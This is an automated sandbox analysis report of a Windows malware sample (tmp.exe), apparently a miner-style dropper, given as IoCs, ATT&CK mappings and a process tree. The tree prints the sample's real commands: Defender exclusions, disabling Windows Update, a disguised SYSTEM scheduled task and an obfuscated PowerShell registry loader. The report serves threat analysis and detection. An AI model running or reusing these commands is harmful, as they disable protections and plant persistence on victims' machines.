65970760831f083ce65c5ec185f5c1d1c73217bcf600de567f2960b592412c52

Analysis

max time kernel
151s
max time network
58s
platform
windows7_x64
resource
win7-20220901-en
resource tags

arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
submitted
02-09-2022 05:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tmp.exe
Size

4.5MB
MD5

b7c12ce33a5c2de80bcd7083d839df6e
SHA1

6d2bce616fc00cafeb2ae4c5499305b36fcfb4f1
SHA256

65970760831f083ce65c5ec185f5c1d1c73217bcf600de567f2960b592412c52
SHA512

b3cbb1c781217aee343352f5ef2668fec9aa70a3f8ed39eafef88815bc4b5a858965d4ea9d30f86e04cdff4d22bef4447333027a56fbc02fc9708203e9987225
SSDEEP

98304:Ha3DFNglg7shj9/X92ZmvG+Hc7supSg8MXGBl3Qbf2jYpvRhzPQA:q23V9/X9pvL+sWKMXGwDEYVx

Score

10^/10

discovery evasion exploit

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

powershell.EXEpowershell.EXE

description pid process target process

PID 1736 created 416 1736 powershell.EXE winlogon.exe
PID 1072 created 416 1072 powershell.EXE winlogon.exe
Possible privilege escalation attempt 2 IoCs
exploit

Processes:

icacls.exetakeown.exe

pid process

1160 icacls.exe
548 takeown.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Modifies file permissions 1 TTPs 2 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exe

pid process

548 takeown.exe
1160 icacls.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

3 ip-api.com

description	pid	process	target process
PID 1736 created 416	1736	powershell.EXE	winlogon.exe
PID 1072 created 416	1072	powershell.EXE	winlogon.exe

pid	process
1160	icacls.exe
548	takeown.exe

pid	process
548	takeown.exe
1160	icacls.exe

flow	ioc
3	ip-api.com

Drops file in System32 directory 3 IoCs

Processes:

powershell.exepowershell.EXEpowershell.EXE

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

Suspicious use of SetThreadContext 3 IoCs

Processes:

tmp.exepowershell.EXEpowershell.EXE

description	pid	process	target process
PID 1104 set thread context of 460	1104	tmp.exe	conhost.exe
PID 1736 set thread context of 1348	1736	powershell.EXE	dllhost.exe
PID 1072 set thread context of 1604	1072	powershell.EXE	dllhost.exe

Drops file in Program Files directory 2 IoCs

Processes:

tmp.exe

description	ioc	process
File created	C:\Program Files\Google\Chrome\updater.exe	tmp.exe
File opened for modification	C:\Program Files\Google\Chrome\updater.exe	tmp.exe

Drops file in Windows directory 4 IoCs

Processes:

conhost.exe

description	ioc	process
File created	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	conhost.exe

Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

1000 sc.exe
364 sc.exe
1612 sc.exe
1508 sc.exe
288 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

2032 schtasks.exe

pid	process
1000	sc.exe
364	sc.exe
1612	sc.exe
1508	sc.exe
288	sc.exe

pid	process
2032	schtasks.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

powershell.EXE

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = d06b69b08ebed801	powershell.EXE

Modifies registry key 1 TTPs 9 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid process

1700 reg.exe
2024 reg.exe
2012 reg.exe
1764 reg.exe
732 reg.exe
1720 reg.exe
2000 reg.exe
1716 reg.exe
1552 reg.exe

pid	process
1700	reg.exe
2024	reg.exe
2012	reg.exe
1764	reg.exe
732	reg.exe
1720	reg.exe
2000	reg.exe
1716	reg.exe
1552	reg.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

tmp.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	tmp.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	tmp.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exetmp.exepowershell.EXEdllhost.exepowershell.EXEdllhost.exe

pid	process
1372	powershell.exe
1104	tmp.exe
1736	powershell.EXE
1736	powershell.EXE
1348	dllhost.exe
1348	dllhost.exe
1348	dllhost.exe
1348	dllhost.exe
1072	powershell.EXE
1072	powershell.EXE
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe
1604	dllhost.exe

Suspicious use of AdjustPrivilegeToken 13 IoCs

Processes:

powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.exetmp.exepowershell.EXEdllhost.exepowershell.EXEdllhost.exe

description	pid	process
Token: SeDebugPrivilege	1372	powershell.exe
Token: SeShutdownPrivilege	1520	powercfg.exe
Token: SeShutdownPrivilege	1060	powercfg.exe
Token: SeShutdownPrivilege	1032	powercfg.exe
Token: SeShutdownPrivilege	1864	powercfg.exe
Token: SeTakeOwnershipPrivilege	548	takeown.exe
Token: SeDebugPrivilege	1104	tmp.exe
Token: SeDebugPrivilege	1736	powershell.EXE
Token: SeDebugPrivilege	1736	powershell.EXE
Token: SeDebugPrivilege	1348	dllhost.exe
Token: SeDebugPrivilege	1072	powershell.EXE
Token: SeDebugPrivilege	1072	powershell.EXE
Token: SeDebugPrivilege	1604	dllhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

tmp.execmd.execmd.exe

description	pid	process	target process
PID 1104 wrote to memory of 1372	1104	tmp.exe	powershell.exe
PID 1104 wrote to memory of 1372	1104	tmp.exe	powershell.exe
PID 1104 wrote to memory of 1372	1104	tmp.exe	powershell.exe
PID 1104 wrote to memory of 1512	1104	tmp.exe	cmd.exe
PID 1104 wrote to memory of 1512	1104	tmp.exe	cmd.exe
PID 1104 wrote to memory of 1512	1104	tmp.exe	cmd.exe
PID 1104 wrote to memory of 816	1104	tmp.exe	cmd.exe
PID 1104 wrote to memory of 816	1104	tmp.exe	cmd.exe
PID 1104 wrote to memory of 816	1104	tmp.exe	cmd.exe
PID 1512 wrote to memory of 1000	1512	cmd.exe	sc.exe
PID 1512 wrote to memory of 1000	1512	cmd.exe	sc.exe
PID 1512 wrote to memory of 1000	1512	cmd.exe	sc.exe
PID 816 wrote to memory of 1520	816	cmd.exe	powercfg.exe
PID 816 wrote to memory of 1520	816	cmd.exe	powercfg.exe
PID 816 wrote to memory of 1520	816	cmd.exe	powercfg.exe
PID 1512 wrote to memory of 364	1512	cmd.exe	sc.exe
PID 1512 wrote to memory of 364	1512	cmd.exe	sc.exe
PID 1512 wrote to memory of 364	1512	cmd.exe	sc.exe
PID 1512 wrote to memory of 1612	1512	cmd.exe	sc.exe
PID 1512 wrote to memory of 1612	1512	cmd.exe	sc.exe
PID 1512 wrote to memory of 1612	1512	cmd.exe	sc.exe
PID 1512 wrote to memory of 1508	1512	cmd.exe	sc.exe
PID 1512 wrote to memory of 1508	1512	cmd.exe	sc.exe
PID 1512 wrote to memory of 1508	1512	cmd.exe	sc.exe
PID 1512 wrote to memory of 288	1512	cmd.exe	sc.exe
PID 1512 wrote to memory of 288	1512	cmd.exe	sc.exe
PID 1512 wrote to memory of 288	1512	cmd.exe	sc.exe
PID 816 wrote to memory of 1060	816	cmd.exe	powercfg.exe
PID 816 wrote to memory of 1060	816	cmd.exe	powercfg.exe
PID 816 wrote to memory of 1060	816	cmd.exe	powercfg.exe
PID 1512 wrote to memory of 2012	1512	cmd.exe	reg.exe
PID 1512 wrote to memory of 2012	1512	cmd.exe	reg.exe
PID 1512 wrote to memory of 2012	1512	cmd.exe	reg.exe
PID 1512 wrote to memory of 1700	1512	cmd.exe	reg.exe
PID 1512 wrote to memory of 1700	1512	cmd.exe	reg.exe
PID 1512 wrote to memory of 1700	1512	cmd.exe	reg.exe
PID 816 wrote to memory of 1032	816	cmd.exe	powercfg.exe
PID 816 wrote to memory of 1032	816	cmd.exe	powercfg.exe
PID 816 wrote to memory of 1032	816	cmd.exe	powercfg.exe
PID 1512 wrote to memory of 1764	1512	cmd.exe	reg.exe
PID 1512 wrote to memory of 1764	1512	cmd.exe	reg.exe
PID 1512 wrote to memory of 1764	1512	cmd.exe	reg.exe
PID 1512 wrote to memory of 732	1512	cmd.exe	reg.exe
PID 1512 wrote to memory of 732	1512	cmd.exe	reg.exe
PID 1512 wrote to memory of 732	1512	cmd.exe	reg.exe
PID 1512 wrote to memory of 1720	1512	cmd.exe	reg.exe
PID 1512 wrote to memory of 1720	1512	cmd.exe	reg.exe
PID 1512 wrote to memory of 1720	1512	cmd.exe	reg.exe
PID 816 wrote to memory of 1864	816	cmd.exe	powercfg.exe
PID 816 wrote to memory of 1864	816	cmd.exe	powercfg.exe
PID 816 wrote to memory of 1864	816	cmd.exe	powercfg.exe
PID 1512 wrote to memory of 548	1512	cmd.exe	takeown.exe
PID 1512 wrote to memory of 548	1512	cmd.exe	takeown.exe
PID 1512 wrote to memory of 548	1512	cmd.exe	takeown.exe
PID 1512 wrote to memory of 1160	1512	cmd.exe	icacls.exe
PID 1512 wrote to memory of 1160	1512	cmd.exe	icacls.exe
PID 1512 wrote to memory of 1160	1512	cmd.exe	icacls.exe
PID 1512 wrote to memory of 2000	1512	cmd.exe	reg.exe
PID 1512 wrote to memory of 2000	1512	cmd.exe	reg.exe
PID 1512 wrote to memory of 2000	1512	cmd.exe	reg.exe
PID 1512 wrote to memory of 1716	1512	cmd.exe	reg.exe
PID 1512 wrote to memory of 1716	1512	cmd.exe	reg.exe
PID 1512 wrote to memory of 1716	1512	cmd.exe	reg.exe
PID 1512 wrote to memory of 1552	1512	cmd.exe	reg.exe

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:472

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
PID:464

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS
2⤵
PID:656

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
2⤵
PID:788

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
2⤵
PID:736

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
2⤵
PID:576

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:416

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{345038cd-cfa0-42f9-86c9-db9764b42458}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1348

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{652ec2b7-1b82-448a-add5-9cb215926704}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1604

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:480

C:\Users\Admin\AppData\Local\Temp\tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp.exe"
1⤵
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1104

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAYgByAGwAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBtAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbwB4AGIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdQBpAHcAdwAjAD4A"
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1372

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
2⤵
- Suspicious use of WriteProcessMemory
PID:1512

C:\Windows\system32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:1000

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:364

C:\Windows\system32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:1612

C:\Windows\system32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:1508

C:\Windows\system32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:288

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
3⤵
- Modifies registry key
PID:2012

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
3⤵
- Modifies registry key
PID:1700

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
3⤵
- Modifies security service
- Modifies registry key
PID:1764

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
3⤵
- Modifies registry key
PID:732

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:548

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
3⤵
- Modifies registry key
PID:1720

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1160

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:2000

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:1716

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:1552

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:2024

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
3⤵
PID:1904

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
3⤵
PID:1280

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
3⤵
PID:840

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
3⤵
PID:604

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
3⤵
PID:1264

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
3⤵
PID:1568

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
PID:1708

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:816

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1520

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1060

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1032

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1864

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
2⤵
- Drops file in Windows directory
PID:460

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
2⤵
PID:1452

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
3⤵
- Creates scheduled task(s)
PID:2032

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
2⤵
PID:1368

C:\Windows\system32\schtasks.exe
schtasks /run /tn "GoogleUpdateTaskMachineQC"
3⤵
PID:2020

C:\Windows\system32\taskeng.exe
taskeng.exe {CAF15D22-BA3F-49BF-970E-9336E082DFAA} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:812

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1736

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1072

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

File Permissions Modification

T1222

Install Root Certificate

T1130

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/288-71-0x0000000000000000-mapping.dmp

Download
memory/364-68-0x0000000000000000-mapping.dmp

Download
memory/416-145-0x0000000000750000-0x000000000077A000-memory.dmp

Filesize
168KB

Download
memory/416-140-0x0000000037570000-0x0000000037580000-memory.dmp

Filesize
64KB

Download
memory/416-139-0x000007FEBDF00000-0x000007FEBDF10000-memory.dmp

Filesize
64KB

Download
memory/416-136-0x0000000000720000-0x0000000000743000-memory.dmp

Filesize
140KB

Download
memory/416-200-0x0000000000750000-0x000000000077A000-memory.dmp

Filesize
168KB

Download
memory/460-108-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/460-97-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/460-105-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/460-104-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
